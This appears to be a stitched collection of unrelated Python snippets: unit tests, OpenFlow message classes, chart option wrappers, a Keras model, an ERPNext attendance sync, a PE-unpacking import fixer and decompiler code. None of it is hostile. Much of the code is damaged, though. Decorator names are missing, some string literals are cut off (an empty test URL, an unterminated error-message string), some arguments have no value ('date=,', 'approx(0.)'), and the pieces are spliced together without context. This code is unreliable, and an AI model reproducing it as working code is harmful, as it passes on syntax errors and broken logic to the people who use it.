self.assertEqual(heap.array[1], 20)
self.assertEqual(heap.array[2], 15)
self.assertEqual(heap.array[3], 22)
self.assertEqual(heap.array[4], 40)
heap.insert(3)
self.assertEqual(heap.array[0], 3)
self.assertEqual(heap.array[1], 20)
self.assertEqual(heap.array[2], 5)
self.assertEqual(heap.array[3], 22)
self.assertEqual(heap.array[4], 40)
self.assertEqual(heap.array[5], 15)
mins = []
while heap:
mins.append(heap.extract_min())
self.assertEqual(mins, [3, 5, 15, 20, 22, 40])
print('Success: test_min_heap') |
.django_db
def test_tas_balances_total(account_models, client):
response_tas_sums = {'XYZ': '10.00', 'ZZZ': '5.00'}
resp = client.post('/api/v1/tas/balances/total/', content_type='application/json', data=json.dumps({'field': 'budget_authority_unobligated_balance_brought_forward_fyb', 'group': 'treasury_account_identifier__tas_rendering_label'}))
assert (resp.status_code == 200)
assert (len(resp.data['results']) == 2)
for result in resp.data['results']:
assert (response_tas_sums[result['item']] == result['aggregate']) |
class RayLauncher(Launcher):
def __init__(self, ray: DictConfig) -> None:
self.ray_cfg = ray
self.hydra_context: Optional[HydraContext] = None
self.task_function: Optional[TaskFunction] = None
self.config: Optional[DictConfig] = None
def setup(self, *, hydra_context: HydraContext, task_function: TaskFunction, config: DictConfig) -> None:
self.config = config
self.hydra_context = hydra_context
self.task_function = task_function
def launch(self, job_overrides: Sequence[Sequence[str]], initial_job_idx: int) -> Sequence[JobReturn]:
from . import _core
return _core.launch(launcher=self, job_overrides=job_overrides, initial_job_idx=initial_job_idx) |
class OptionPlotoptionsOrganizationSonificationDefaultspeechoptionsMappingVolume(Options):
def mapFunction(self):
return self._config_get(None)
def mapFunction(self, value: Any):
self._config(value, js_type=False)
def mapTo(self):
return self._config_get(None)
def mapTo(self, text: str):
self._config(text, js_type=False)
def max(self):
return self._config_get(None)
def max(self, num: float):
self._config(num, js_type=False)
def min(self):
return self._config_get(None)
def min(self, num: float):
self._config(num, js_type=False)
def within(self):
return self._config_get(None)
def within(self, value: Any):
self._config(value, js_type=False) |
class Model(object):
def __init__(self, input_shape, output_labels_size):
model = keras.Sequential()
model.add(layers.Convolution2D(16, (3, 3), padding='same', input_shape=input_shape, activation='relu'))
model.add(layers.MaxPooling2D(pool_size=(2, 2)))
model.add(layers.Convolution2D(32, (3, 3), padding='same', activation='relu'))
model.add(layers.MaxPooling2D(pool_size=(2, 2)))
model.add(layers.Convolution2D(64, (3, 3), padding='same', activation='relu'))
model.add(layers.MaxPooling2D(pool_size=(2, 2)))
model.add(layers.Flatten())
model.add(layers.Dense(128, activation='relu'))
model.add(layers.Dense(output_labels_size, activation='softmax'))
model.compile(loss='categorical_crossentropy', optimizer=tf.train.AdamOptimizer(), metrics=['top_k_categorical_accuracy'])
self.model = model
print(model.summary())
def fit(self, X, Y, batch_size=256, epochs=5, validation_split=0.1, verbose=2):
self.model.fit(x=X, y=Y, batch_size=batch_size, epochs=epochs, validation_split=validation_split, verbose=verbose)
def score(self, X, Y):
return self.model.evaluate(X, Y, verbose=0)
def predict_one(self, x):
x = np.expand_dims(x, axis=0)
pred = self.model.predict(x)[0]
return pred
def predict(self, X):
return self.model.predict(X)
def save(self, file):
self.model.save(file)
def load(file):
return load_model(file) |
('foremast.elb.format_listeners.get_template')
def test_elb_cert_name_v1(rendered_template):
rendered_template.return_value = SAMPLE_TLSCERT_V1_JSON
iam_cert = 'arn:aws:iam:::server-certificate/wildcard.example.com-2020-07-15'
assert (iam_cert == format_cert_name(env='prod', account='', region='us-east-1', certificate='wildcard.example.com'))
acm_cert = 'arn:aws:acm:us-east-1::certificate/-2222-3333-4444-'
assert (acm_cert == format_cert_name(env='prod', account='', region='us-east-1', certificate='wildcard.prod.example.com'))
acm_region_cert = 'arn:aws:acm:us-west-2::certificate/-0000-2222-3333-'
assert (acm_region_cert == format_cert_name(env='prod', account='', region='us-west-2', certificate='wildcard.us-west-2.prod.example.com')) |
def pull_process_and_push_data(device, device_attendance_logs=None):
attendance_success_log_file = '_'.join(['attendance_success_log', device['device_id']])
attendance_failed_log_file = '_'.join(['attendance_failed_log', device['device_id']])
attendance_success_logger = setup_logger(attendance_success_log_file, ('/'.join([config.LOGS_DIRECTORY, attendance_success_log_file]) + '.log'))
attendance_failed_logger = setup_logger(attendance_failed_log_file, ('/'.join([config.LOGS_DIRECTORY, attendance_failed_log_file]) + '.log'))
if (not device_attendance_logs):
device_attendance_logs = get_all_attendance_from_device(device['ip'], device_id=device['device_id'], clear_from_device_on_fetch=device['clear_from_device_on_fetch'])
if (not device_attendance_logs):
return
index_of_last = (- 1)
last_line = get_last_line_from_file(('/'.join([config.LOGS_DIRECTORY, attendance_success_log_file]) + '.log'))
import_start_date = _safe_convert_date(config.IMPORT_START_DATE, '%Y%m%d')
if (last_line or import_start_date):
last_user_id = None
last_timestamp = None
if last_line:
(last_user_id, last_timestamp) = last_line.split('\t')[4:6]
last_timestamp = datetime.datetime.fromtimestamp(float(last_timestamp))
if import_start_date:
if last_timestamp:
if (last_timestamp < import_start_date):
last_timestamp = import_start_date
last_user_id = None
else:
last_timestamp = import_start_date
for (i, x) in enumerate(device_attendance_logs):
if (last_user_id and last_timestamp):
if ((last_user_id == str(x['user_id'])) and (last_timestamp == x['timestamp'])):
index_of_last = i
break
elif last_timestamp:
if (x['timestamp'] >= last_timestamp):
index_of_last = i
break
for device_attendance_log in device_attendance_logs[(index_of_last + 1):]:
punch_direction = device['punch_direction']
if (punch_direction == 'AUTO'):
if (device_attendance_log['punch'] in device_punch_values_OUT):
punch_direction = 'OUT'
elif (device_attendance_log['punch'] in device_punch_values_IN):
punch_direction = 'IN'
else:
punch_direction = None
(erpnext_status_code, erpnext_message) = send_to_erpnext(device_attendance_log['user_id'], device_attendance_log['timestamp'], device['device_id'], punch_direction)
if (erpnext_status_code == 200):
attendance_success_logger.info('\t'.join([erpnext_message, str(device_attendance_log['uid']), str(device_attendance_log['user_id']), str(device_attendance_log['timestamp'].timestamp()), str(device_attendance_log['punch']), str(device_attendance_log['status']), json.dumps(device_attendance_log, default=str)]))
else:
attendance_failed_logger.error('\t'.join([str(erpnext_status_code), str(device_attendance_log['uid']), str(device_attendance_log['user_id']), str(device_attendance_log['timestamp'].timestamp()), str(device_attendance_log['punch']), str(device_attendance_log['status']), json.dumps(device_attendance_log, default=str)]))
if (not any(((error in erpnext_message) for error in allowlisted_errors))):
raise Exception('API Call to ERPNext Failed.') |
_stats_reply_type(ofproto.OFPST_GROUP_DESC)
class OFPGroupDescStats(StringifyMixin):
def __init__(self, type_, group_id, buckets, length=None):
self.type = type_
self.group_id = group_id
self.buckets = buckets
def parser(cls, buf, offset):
(length, type_, group_id) = struct.unpack_from(ofproto.OFP_GROUP_DESC_STATS_PACK_STR, buf, offset)
bucket_len = (length - ofproto.OFP_GROUP_DESC_STATS_SIZE)
offset += ofproto.OFP_GROUP_DESC_STATS_SIZE
buckets = []
while (bucket_len > 0):
bucket = OFPBucket.parser(buf, offset)
buckets.append(bucket)
offset += bucket.len
bucket_len -= bucket.len
o = cls(type_, group_id, buckets)
o.length = length
return o |
def check_metric(mh, cfg, loc, metric, metrics, justifications):
if (not cfg.metric_enabled(metric)):
return
elif cfg.metric_check(metric):
measure = metrics[metric]['measure']
if (measure is None):
return
limit = cfg.metric_upper_limit(metric)
metrics[metric]['limit'] = limit
if (measure > limit):
if (metric in justifications):
mh.metric_justifications += 1
justifications[metric].applies = True
metrics[metric]['reason'] = justifications[metric].reason()
metrics[metric]['tickets'] = justifications[metric].tickets
else:
mh.metric_issue(loc, ('exceeded %s: measured %u > limit %u' % (config.METRICS[metric].longname.lower(), measure, limit)), metric) |
class controller_status(message):
version = 6
type = 35
def __init__(self, xid=None, entry=None):
if (xid != None):
self.xid = xid
else:
self.xid = None
if (entry != None):
self.entry = entry
else:
self.entry = loxi.unimplemented('init of_controller_status_entry_t')
return
def pack(self):
packed = []
packed.append(struct.pack('!B', self.version))
packed.append(struct.pack('!B', self.type))
packed.append(struct.pack('!H', 0))
packed.append(struct.pack('!L', self.xid))
packed.append(loxi.unimplemented('pack of_controller_status_entry_t'))
length = sum([len(x) for x in packed])
packed[2] = struct.pack('!H', length)
return ''.join(packed)
def unpack(reader):
obj = controller_status()
_version = reader.read('!B')[0]
assert (_version == 6)
_type = reader.read('!B')[0]
assert (_type == 35)
_length = reader.read('!H')[0]
orig_reader = reader
reader = orig_reader.slice(_length, 4)
obj.xid = reader.read('!L')[0]
obj.entry = loxi.unimplemented('unpack of_controller_status_entry_t')
return obj
def __eq__(self, other):
if (type(self) != type(other)):
return False
if (self.xid != other.xid):
return False
if (self.entry != other.entry):
return False
return True
def pretty_print(self, q):
q.text('controller_status {')
with q.group():
with q.indent(2):
q.breakable()
q.text('xid = ')
if (self.xid != None):
q.text(('%#x' % self.xid))
else:
q.text('None')
q.text(',')
q.breakable()
q.text('entry = ')
q.pp(self.entry)
q.breakable()
q.text('}') |
def read_solutions_table(readme_fp):
def parse_line(line):
elems = [el for el in line.strip().split('|') if el]
question_elem = elems[1]
match = re.search('\\[(.+?)\\]\\((.+)\\)', question_elem)
if (not match):
raise ValueError('{} is not a valid link'.format(question_elem))
elems[1] = (match.group(1), match.group(2))
solution_elem = elems[2]
match = re.search('\\[(.+?)\\]\\((.+)\\)', solution_elem)
if (not match):
raise ValueError('{} is not a valid link'.format(solution_elem))
elems[2] = (match.group(1).split(','), match.group(2))
return elems
data = []
in_content = begin_parsing = False
with open(readme_fp) as ifile:
for line in ifile:
if line.startswith('### Contents'):
in_content = True
elif (in_content and line.startswith('|---')):
begin_parsing = True
elif (begin_parsing and line.startswith('|')):
data.append(parse_line(line))
elif (begin_parsing and (not line.strip())):
begin_parsing = False
in_content = False
return data |
def fix_and_dump_pe(process_controller: ProcessController, pe_file_path: str, image_base: int, oep: int, text_section_range: MemoryRange) -> None:
section_virtual_addr = (image_base + text_section_range.base)
text_section_range = MemoryRange(section_virtual_addr, text_section_range.size, 'r-x', process_controller.read_process_memory(section_virtual_addr, text_section_range.size))
assert (text_section_range.data is not None)
LOG.debug('.text section: %s', str(text_section_range))
arch = process_controller.architecture
exports_dict = process_controller.enumerate_exported_functions()
if (arch == Architecture.X86_32):
cs_mode = CS_MODE_32
elif (arch == Architecture.X86_64):
cs_mode = CS_MODE_64
else:
raise NotImplementedError(f'Unsupported architecture: {arch}')
md = Cs(CS_ARCH_X86, cs_mode)
md.detail = True
LOG.info('Looking for wrapped imports ...')
(api_to_calls, wrapper_set) = find_wrapped_imports(text_section_range, exports_dict, md, process_controller)
LOG.info('Potential import wrappers found: %d', len(wrapper_set))
export_hashes = None
if (arch == Architecture.X86_32):
LOG.info("Generating exports' hashes, this might take some time ...")
export_hashes = _generate_export_hashes(md, exports_dict, process_controller)
LOG.info('Resolving imports ...')
_resolve_imports(api_to_calls, wrapper_set, export_hashes, md, process_controller)
LOG.info('Imports resolved: %d', len(api_to_calls))
(iat_addr, iat_size) = _generate_new_iat_in_process(api_to_calls, text_section_range.base, process_controller)
LOG.info('Generated the fake IAT at %s, size=%s', hex(iat_addr), hex(iat_size))
process_controller.set_memory_protection(text_section_range.base, text_section_range.size, 'rwx')
LOG.info('Patching call and jmp sites ...')
_fix_import_references_in_process(api_to_calls, iat_addr, process_controller)
process_controller.set_memory_protection(text_section_range.base, text_section_range.size, 'r-x')
LOG.info('Dumping PE with OEP=%s ...', hex(oep))
dump_pe(process_controller, pe_file_path, image_base, oep, iat_addr, iat_size, True) |
def check_valid_call():
if ('-s' not in sys.argv):
msg = 'You must use the `-s` flag when running integration tests.'
print(msg)
return False
if (sum(((platform in ' '.join(sys.argv)) for platform in ['platform_sh', 'fly_io', 'heroku'])) == 1):
return True
else:
msg = 'For integration testing, you must target one specific platform.'
print(msg)
return False
return False |
class LiteSATAMirroring(Module):
def __init__(self, controllers):
n = len(controllers)
dw = len(controllers[0].sink.data)
self.ports = [LiteSATAUserPort(dw) for i in range(n)]
self.submodules.ctrl = LiteSATAMirroringCtrl(n)
self.submodules.tx = LiteSATAMirroringTX(n, dw, self.ctrl)
self.submodules.rx = LiteSATAMirroringRX(n, dw, self.ctrl)
for i in range(n):
self.comb += [self.ports[i].sink.connect(self.tx.sinks[i]), self.tx.sources[i].connect(controllers[i].sink), controllers[i].source.connect(self.rx.sinks[i]), self.rx.sources[i].connect(self.ports[i].source)] |
def build_head(config):
from .det_db_head import DBHead
from .det_east_head import EASTHead
from .det_sast_head import SASTHead
from .det_pse_head import PSEHead
from .e2e_pg_head import PGHead
from .rec_ctc_head import CTCHead
from .rec_att_head import AttentionHead
from .rec_srn_head import SRNHead
from .rec_nrtr_head import Transformer
from .rec_sar_head import SARHead
from .rec_aster_head import AsterHead
from .cls_head import ClsHead
from .kie_sdmgr_head import SDMGRHead
from .table_att_head import TableAttentionHead
support_dict = ['DBHead', 'PSEHead', 'EASTHead', 'SASTHead', 'CTCHead', 'ClsHead', 'AttentionHead', 'SRNHead', 'PGHead', 'Transformer', 'TableAttentionHead', 'SARHead', 'AsterHead', 'SDMGRHead']
module_name = config.pop('name')
assert (module_name in support_dict), Exception('head only support {}'.format(support_dict))
module_class = eval(module_name)(**config)
return module_class |
def download_file(url, dstpath, download_even_if_exists=False, filename_prefix='', silent=False):
debug_print((((('download_file(url=' + url) + ', dstpath=') + dstpath) + ')'))
file_name = get_download_target(url, dstpath, filename_prefix)
if (os.path.exists(file_name) and (not download_even_if_exists)):
print((("File '" + file_name) + "' already downloaded, skipping."))
return file_name
try:
u = urlopen(url)
mkdir_p(os.path.dirname(file_name))
with open(file_name, 'wb') as f:
file_size = get_content_length(u)
if (file_size > 0):
print(('Downloading: %s from %s, %s Bytes' % (file_name, url, file_size)))
else:
print(('Downloading: %s from %s' % (file_name, url)))
file_size_dl = 0
progress_max = (80 - 4)
progress_shown = 0
block_sz = (256 * 1024)
if (not TTY_OUTPUT):
print(' [', end='')
while True:
buffer = u.read(block_sz)
if (not buffer):
break
file_size_dl += len(buffer)
f.write(buffer)
if file_size:
percent = ((file_size_dl * 100.0) / file_size)
if TTY_OUTPUT:
status = (' %10d [%3.02f%%]' % (file_size_dl, percent))
print(status, end='\r')
else:
while (progress_shown < ((progress_max * percent) / 100)):
print('-', end='')
sys.stdout.flush()
progress_shown += 1
if (not TTY_OUTPUT):
print(']')
sys.stdout.flush()
except Exception as e:
if (not silent):
errlog(((("Error: Downloading URL '" + url) + "': ") + str(e)))
if (('SSL: CERTIFICATE_VERIFY_FAILED' in str(e)) or ('urlopen error unknown url type: in str(e))):
errlog('Warning: Possibly SSL/TLS issue. Update or install Python SSL root certificates (2048-bit or greater) supplied in Python folder or and try again.')
rmfile(file_name)
return None
except KeyboardInterrupt:
rmfile(file_name)
exit_with_error('aborted by user, exiting')
return file_name |
class TestSSEClient():
test_url = '
def init_sse(self, payload, recorder=None):
if (recorder is None):
recorder = []
adapter = MockSSEClientAdapter(payload, recorder)
session = requests.Session()
session.mount(self.test_url, adapter)
return _sseclient.SSEClient(url=self.test_url, session=session, retry=1)
def test_init_sseclient(self):
payload = 'event: put\ndata: {"path":"/","data":"testevent"}\n\n'
sseclient = self.init_sse(payload)
assert (sseclient.url == self.test_url)
assert (sseclient.session is not None)
def test_single_event(self):
payload = 'event: put\ndata: {"path":"/","data":"testevent"}\n\n'
recorder = []
sseclient = self.init_sse(payload, recorder)
event = next(sseclient)
event_payload = json.loads(event.data)
assert (event_payload['data'] == 'testevent')
assert (event_payload['path'] == '/')
assert (len(recorder) == 1)
event = next(sseclient)
event_payload = json.loads(event.data)
assert (event_payload['data'] == 'testevent')
assert (event_payload['path'] == '/')
assert (len(recorder) == 2)
def test_large_event(self):
data = ('a' * int(((0.1 * 1024) * 1024)))
payload = (('event: put\ndata: {"path":"/","data":"' + data) + '"}\n\n')
recorder = []
sseclient = self.init_sse(payload, recorder)
event = next(sseclient)
event_payload = json.loads(event.data)
assert (event_payload['data'] == data)
assert (event_payload['path'] == '/')
assert (len(recorder) == 1)
def test_multiple_events(self):
payload = 'event: put\ndata: {"path":"/foo","data":"testevent1"}\n\n'
payload += 'event: put\ndata: {"path":"/bar","data":"testevent2"}\n\n'
recorder = []
sseclient = self.init_sse(payload, recorder)
event = next(sseclient)
event_payload = json.loads(event.data)
assert (event_payload['data'] == 'testevent1')
assert (event_payload['path'] == '/foo')
event = next(sseclient)
event_payload = json.loads(event.data)
assert (event_payload['data'] == 'testevent2')
assert (event_payload['path'] == '/bar')
assert (len(recorder) == 1)
def test_event_separators(self):
payload = 'event: put\ndata: {"path":"/foo","data":"testevent1"}\n\n'
payload += 'event: put\ndata: {"path":"/bar","data":"testevent2"}\r\r'
payload += 'event: put\ndata: {"path":"/baz","data":"testevent3"}\r\n\r\n'
recorder = []
sseclient = self.init_sse(payload, recorder)
event = next(sseclient)
event_payload = json.loads(event.data)
assert (event_payload['data'] == 'testevent1')
assert (event_payload['path'] == '/foo')
event = next(sseclient)
event_payload = json.loads(event.data)
assert (event_payload['data'] == 'testevent2')
assert (event_payload['path'] == '/bar')
event = next(sseclient)
event_payload = json.loads(event.data)
assert (event_payload['data'] == 'testevent3')
assert (event_payload['path'] == '/baz')
assert (len(recorder) == 1) |
def request(method: str, url: URLTypes, *, params: typing.Optional[QueryParamTypes]=None, content: typing.Optional[RequestContent]=None, data: typing.Optional[RequestData]=None, files: typing.Optional[RequestFiles]=None, json: typing.Optional[typing.Any]=None, headers: typing.Optional[HeaderTypes]=None, cookies: typing.Optional[CookieTypes]=None, auth: typing.Optional[AuthTypes]=None, proxy: typing.Optional[ProxyTypes]=None, proxies: typing.Optional[ProxiesTypes]=None, timeout: TimeoutTypes=DEFAULT_TIMEOUT_CONFIG, follow_redirects: bool=False, verify: VerifyTypes=True, cert: typing.Optional[CertTypes]=None, trust_env: bool=True) -> Response:
with Client(cookies=cookies, proxy=proxy, proxies=proxies, cert=cert, verify=verify, timeout=timeout, trust_env=trust_env) as client:
return client.request(method=method, url=url, content=content, data=data, files=files, json=json, params=params, headers=headers, auth=auth, follow_redirects=follow_redirects) |
def test_changing_case(qtbot, notifier, storage):
ensemble_a = storage.create_experiment().create_ensemble(name='default_a', ensemble_size=1)
ensemble_b = storage.create_experiment().create_ensemble(name='default_b', ensemble_size=1)
notifier.set_storage(storage)
notifier.set_current_case(ensemble_a)
widget_a = CaseSelector(notifier)
widget_b = CaseSelector(notifier)
qtbot.addWidget(widget_a)
qtbot.addWidget(widget_b)
assert (widget_a.count() == 2)
assert (widget_b.count() == 2)
assert (widget_a.currentData() == ensemble_a)
assert (widget_b.currentData() == ensemble_a)
notifier.set_current_case(ensemble_b)
assert (widget_a.currentData() == ensemble_b)
assert (widget_b.currentData() == ensemble_b)
qtbot.keyClicks(widget_a, widget_a.itemText(widget_a.findData(ensemble_a)))
assert (notifier.current_case == ensemble_a)
assert (widget_a.currentData() == ensemble_a)
assert (widget_b.currentData() == ensemble_a) |
class Lab(base.CIELab):
def to_string(self, parent: Color, *, alpha: (bool | None)=None, precision: (int | None)=None, fit: ((bool | str) | dict[(str, Any)])=True, none: bool=False, color: bool=False, percent: (bool | Sequence[bool])=False, **kwargs: Any) -> str:
return serialize.serialize_css(parent, func='lab', alpha=alpha, precision=precision, fit=fit, none=none, color=color, percent=percent)
def match(self, string: str, start: int=0, fullmatch: bool=True) -> (tuple[(tuple[(Vector, float)], int)] | None):
return parse.parse_css(self, string, start, fullmatch) |
class OptionPlotoptionsBarStates(Options):
def hover(self) -> 'OptionPlotoptionsBarStatesHover':
return self._config_sub_data('hover', OptionPlotoptionsBarStatesHover)
def inactive(self) -> 'OptionPlotoptionsBarStatesInactive':
return self._config_sub_data('inactive', OptionPlotoptionsBarStatesInactive)
def normal(self) -> 'OptionPlotoptionsBarStatesNormal':
return self._config_sub_data('normal', OptionPlotoptionsBarStatesNormal)
def select(self) -> 'OptionPlotoptionsBarStatesSelect':
return self._config_sub_data('select', OptionPlotoptionsBarStatesSelect) |
.order((- 1))
.parametrize(('username', 'path', 'slug', 'status'), (('tessdoe', 'tess-title-blog-3', 'tell-title-blog-3', 204), ('tessdoe', 'tell-title-blog-10000', 'tell-title-blog-3', 404), ('leodoe', 'tess-title-blog-2', 'tell-title-blog-2', 403)))
def test_delete_post(username, path, slug, status):
headers = {}
req_time = timedelta(minutes=30)
data = {'sub': username}
token_data = create_access_token(data=data, expires_delta=req_time)
headers['Authorization'] = ('Bearer ' + token_data)
response = client.delete(('/posts/' + path), headers=headers)
assert (status == response.status_code) |
def extractFirsttrytranslationsWordpressCom(item):
(vol, chp, frag, postfix) = extractVolChapterFragmentPostfix(item['title'])
if ((not (chp or vol)) or ('preview' in item['title'].lower())):
return None
tagmap = [('PRC', 'PRC', 'translated'), ('Loiterous', 'Loiterous', 'oel')]
for (tagname, name, tl_type) in tagmap:
if (tagname in item['tags']):
return buildReleaseMessageWithType(item, name, vol, chp, frag=frag, postfix=postfix, tl_type=tl_type)
return False |
def test_summary_collector(monkeypatch, snake_oil_case_storage, snake_oil_default_storage, snapshot):
monkeypatch.setenv('TZ', 'CET')
data = snake_oil_default_storage.load_all_summary_data()
snapshot.assert_match(data.iloc[:4].round(4).to_csv(), 'summary_collector_1.csv')
assert (data.shape == (1000, 44))
with pytest.raises(KeyError):
_ = data.loc[60]
data = snake_oil_default_storage.load_all_summary_data(['WWCT:OP1', 'WWCT:OP2'])
snapshot.assert_match(data.iloc[:4].to_csv(), 'summary_collector_2.csv')
assert (data.shape == (1000, 2))
with pytest.raises(KeyError):
_ = data['FOPR']
realization_index = 4
data = snake_oil_default_storage.load_all_summary_data(['WWCT:OP1', 'WWCT:OP2'], realization_index=realization_index)
snapshot.assert_match(data.iloc[:4].to_csv(), 'summary_collector_3.csv')
assert (data.shape == (200, 2))
non_existing_realization_index = 150
with pytest.raises(IndexError):
_ = snake_oil_default_storage.load_all_summary_data(['WWCT:OP1', 'WWCT:OP2'], realization_index=non_existing_realization_index) |
def test_dualperm_fractured_soil_property(dual_poro_dual_perm_run):
soil = dual_poro_dual_perm_run.get_property_from_restart('SOIL', date=, fracture=True)
assert (soil.values[(3, 0, 0)] == pytest.approx(0.0))
assert (soil.values[(0, 1, 0)] == pytest.approx(0.))
assert (soil.values[(3, 2, 0)] == pytest.approx(0.)) |
class port_status(message):
version = 4
type = 12
def __init__(self, xid=None, reason=None, desc=None):
if (xid != None):
self.xid = xid
else:
self.xid = None
if (reason != None):
self.reason = reason
else:
self.reason = 0
if (desc != None):
self.desc = desc
else:
self.desc = ofp.port_desc()
return
def pack(self):
packed = []
packed.append(struct.pack('!B', self.version))
packed.append(struct.pack('!B', self.type))
packed.append(struct.pack('!H', 0))
packed.append(struct.pack('!L', self.xid))
packed.append(struct.pack('!B', self.reason))
packed.append(('\x00' * 7))
packed.append(self.desc.pack())
length = sum([len(x) for x in packed])
packed[2] = struct.pack('!H', length)
return ''.join(packed)
def unpack(reader):
obj = port_status()
_version = reader.read('!B')[0]
assert (_version == 4)
_type = reader.read('!B')[0]
assert (_type == 12)
_length = reader.read('!H')[0]
orig_reader = reader
reader = orig_reader.slice(_length, 4)
obj.xid = reader.read('!L')[0]
obj.reason = reader.read('!B')[0]
reader.skip(7)
obj.desc = ofp.port_desc.unpack(reader)
return obj
def __eq__(self, other):
if (type(self) != type(other)):
return False
if (self.xid != other.xid):
return False
if (self.reason != other.reason):
return False
if (self.desc != other.desc):
return False
return True
def pretty_print(self, q):
q.text('port_status {')
with q.group():
with q.indent(2):
q.breakable()
q.text('xid = ')
if (self.xid != None):
q.text(('%#x' % self.xid))
else:
q.text('None')
q.text(',')
q.breakable()
q.text('reason = ')
value_name_map = {0: 'OFPPR_ADD', 1: 'OFPPR_DELETE', 2: 'OFPPR_MODIFY'}
if (self.reason in value_name_map):
q.text(('%s(%d)' % (value_name_map[self.reason], self.reason)))
else:
q.text(('%#x' % self.reason))
q.text(',')
q.breakable()
q.text('desc = ')
q.pp(self.desc)
q.breakable()
q.text('}') |
class AttachableTests(unittest.TestCase):
def test_unicode(self):
attachable = Attachable()
attachable.FileName = 'test'
self.assertEqual(str(attachable), 'test')
def test_to_ref(self):
attachable = Attachable()
attachable.FileName = 'test'
attachable.Id = 12
ref = attachable.to_ref()
self.assertEqual(ref.name, 'test')
self.assertEqual(ref.type, 'Attachable')
self.assertEqual(ref.value, 12)
def test_valid_object_name(self):
attachable = Attachable()
client = QuickBooks()
result = client.isvalid_object_name(attachable.qbo_object_name)
self.assertTrue(result) |
_renderer(wrap_type=TestCategoryCount)
_renderer(wrap_type=TestCategoryShare)
class TestCategoryRenderer(TestRenderer):
def _get_number_and_percents(s: pd.Series, num: int) -> pd.DataFrame:
return (((s.astype(str) + ' (') + ((s / num) * 100).round(2).astype(str)) + '%)')
def get_value_counts_table_with_percents(self, info: TestHtmlInfo, curr_df: pd.DataFrame, ref_df: Optional[pd.DataFrame], n_curr: int, n_ref: Optional[int], name: str) -> TestHtmlInfo:
curr_df = curr_df.copy()
replace = [('current value counts', n_curr)]
if ((ref_df is not None) and (n_ref is not None)):
ref_df = ref_df.copy()
replace.append(('reference value counts', n_ref))
df = curr_df.merge(ref_df, on='x', how='outer')
df.columns = ['value', 'current value counts', 'reference value counts']
df[['current value counts', 'reference value counts']] = df[['current value counts', 'reference value counts']].fillna(0.0)
df.sort_values(['current value counts', 'reference value counts'], ascending=False, inplace=True)
else:
df = curr_df
df.columns = ['value', 'current value counts']
df.sort_values('current value counts', ascending=False, inplace=True)
for (col, n) in replace:
df[col] = self._get_number_and_percents(df[col].fillna(0), n)
info.details = [DetailsInfo(id=name, title='', info=BaseWidgetInfo(title='', type='table', params={'header': list(df.columns), 'data': df.values}, size=2))]
return info
def render_html(self, obj: Union[(TestCategoryCount, TestCategoryShare)]) -> TestHtmlInfo:
info = super().render_html(obj)
column_name = obj.column_name.display_name
counts_data = obj.metric.get_result().counts_of_values
curr_df = counts_data['current']
ref_df = None
if ('reference' in counts_data.keys()):
ref_df = counts_data['reference']
n_curr = obj.metric.get_result().current.all_num
ref = obj.metric.get_result().reference
n_ref = None
if (ref is not None):
n_ref = ref.all_num
return self.get_value_counts_table_with_percents(info, curr_df, ref_df, n_curr, n_ref, f'cat_counts_{column_name}') |
()
def make_sales_invoice(reference_name, patient, company, therapy_plan_template):
from erpnext.stock.get_item_details import get_item_details
si = frappe.new_doc('Sales Invoice')
si.company = company
si.patient = patient
si.customer = frappe.db.get_value('Patient', patient, 'customer')
item = frappe.db.get_value('Therapy Plan Template', therapy_plan_template, 'linked_item')
(price_list, price_list_currency) = frappe.db.get_values('Price List', {'selling': 1}, ['name', 'currency'])[0]
args = {'doctype': 'Sales Invoice', 'item_code': item, 'company': company, 'customer': si.customer, 'selling_price_list': price_list, 'price_list_currency': price_list_currency, 'plc_conversion_rate': 1.0, 'conversion_rate': 1.0}
item_line = si.append('items', {})
item_details = get_item_details(args)
item_line.item_code = item
item_line.qty = 1
item_line.rate = item_details.price_list_rate
item_line.amount = (flt(item_line.rate) * flt(item_line.qty))
item_line.reference_dt = 'Therapy Plan'
item_line.reference_dn = reference_name
item_line.description = item_details.description
si.set_missing_values(for_validate=True)
return si |
def dump_github() -> str:
self = CTX
r = self.github.graphql('\n query {\n repository(name: "pytorch", owner: "pytorch") {\n pullRequests {\n nodes {\n number\n baseRefName\n headRefName\n title\n body\n closed\n }\n }\n }\n }\n ')
prs = []
for pr in r['data']['repository']['pullRequests']['nodes']:
pr['body'] = indent(pr['body'].replace('\r', ''), ' ')
if (not pr['closed']):
pr['commits'] = self.upstream_sh.git('log', '--graph', '--oneline', '--pretty=format:%h %s', f"{pr['baseRefName']}..{pr['headRefName']}")
pr['commits'] = indent(strip_trailing_whitespace(pr['commits']), ' ')
else:
pr['commits'] = ' (omitted)'
pr['status'] = ('[X]' if pr['closed'] else '[O]')
prs.append('{status} #{number} {title} ({headRefName} -> {baseRefName})\n\n{body}\n\n{commits}\n\n'.format(**pr))
refs = self.upstream_sh.git('log', '--graph', '--oneline', '--branches=gh/*/*/next', '--branches=gh/*/*/head', '--pretty=format:%h%d%n%w(0,3,3)%s')
prs.append((('Repository state:\n\n' + indent(strip_trailing_whitespace(refs), ' ')) + '\n'))
return (indent(''.join(prs), (' ' * 8)) + (' ' * 8)) |
class ExpressionPropagationBase(PipelineStage, ABC):
name = 'expression-propagation-base'
def __init__(self):
self._use_map: UseMap
self._def_map: DefMap
self._pointers_info: Optional[Pointers] = None
self._blocks_map: Optional[DefaultDict[(str, Set)]] = None
self._cfg: Optional[ControlFlowGraph] = None
self._postponed_aliased: Set[Variable] = set()
def run(self, task: DecompilerTask):
iteration = 0
while self.perform(task.graph, iteration):
iteration += 1
logging.info(f'{self.name} took {iteration} iterations')
def perform(self, graph, iteration) -> bool:
is_changed = False
self._cfg = graph
self._initialize_maps(graph)
for basic_block in graph.nodes:
for (index, instruction) in enumerate(basic_block.instructions):
old = str(instruction)
self._try_to_propagate_contractions(instruction)
for var in instruction.requirements:
if (var_definition := self._def_map.get(var)):
if self._definition_can_be_propagated_into_target(var_definition, instruction):
instruction.substitute(var, var_definition.value.copy())
self._update_block_map(old, str(instruction), basic_block, index)
self._update_use_map(var, instruction)
if (not is_changed):
is_changed = (old != str(instruction))
return is_changed
def _definition_can_be_propagated_into_target(self, definition: Assignment, target: Instruction) -> bool:
pass
def _initialize_maps(self, cfg: ControlFlowGraph) -> None:
self._def_map = DefMap()
self._use_map = UseMap()
self._blocks_map = defaultdict(set)
for basic_block in cfg.nodes:
for (index, instruction) in enumerate(basic_block.instructions):
self._blocks_map[str(instruction)].add((basic_block, index))
self._use_map.add(instruction)
self._def_map.add(instruction)
def _update_block_map(self, old_instr_str: str, new_instr_str: str, basic_block: BasicBlock, index: int):
pass
